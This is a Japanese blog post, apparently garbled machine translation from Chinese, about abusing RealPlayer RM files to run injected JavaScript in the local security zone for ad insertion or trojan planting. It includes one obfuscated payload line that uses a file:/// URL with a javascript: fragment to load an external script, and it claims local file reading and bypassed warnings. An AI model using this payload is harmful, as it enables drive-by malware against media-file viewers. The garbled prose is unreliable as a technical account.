1. ホーム
  2. Web プログラミング
  3. セキュリティ関連

広告コードをrm形式で挿入

2022-01-01 07:31:59
一昔前はこのようなことがありましたが、その時は馬を吊るすのに使っていましたが、ふと思い立って、javascriptにジャンプしてみると:jsコードのローカル実装ではこのような形式はまだ少し意味があるので、次をテストしてみます。結果は非常にイライラする、realplayは、この上の制限を持っているようで、制限が自分自身を行う必要があることを確認するために挿入されたRMファイルをチェックし、それは多くのプロトコルがサポートされていないようだ.... そこで、file:///を試してみたところ、サポートされていることがわかったので、少し前にhtmlインジェクションを思いつき、それを追加すれば、ある程度の効果があるはずです。 
コピーコード コードは以下の通りです。

u 00:00:02 00:00:05 file://C:\WINDOWS\Help\iisHelp\common\400.htm#javascript:document.write(String.fromCharCode(60,115,99,114,105,112 116,32,115,114,99,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,116,101,115,116,46,106,115,62,60,47,115,99,114,105, 112,116,62))/ 

挿入されたこのコードは、奇妙な接続が表示されます、次をクリックすると、私の指定したjsを実行します(Microsoftのエンジニアはまだ非常に慎重に、通常の状況下では、この1つ上のhtmlを見つけるために、またポイントです......)。それは確かにローカル領域の実装であることが判明し、あなたがローカルファイルを読み取ることができ、ハァッ...... とrealoneプレイの場合には、すなわち、そのローカル実行のJSコードの警告が魔法のように消えるので、再生するhtmlページに入れ、それは非常に落ち込んでいる、任意のhtmlを開くと警告されますが、それでも魔法のようにファイルのローカル領域を開くことができます....... window.openと通常の状況下で可能ではありません.... ドメインの制限は、私がローカル問題のHTMLは、ハァッ......OKになる見つけるために願って破ることができる。
こういう限界の場所に何か問題があればいいのですが、まだ可能性があるような気がします :)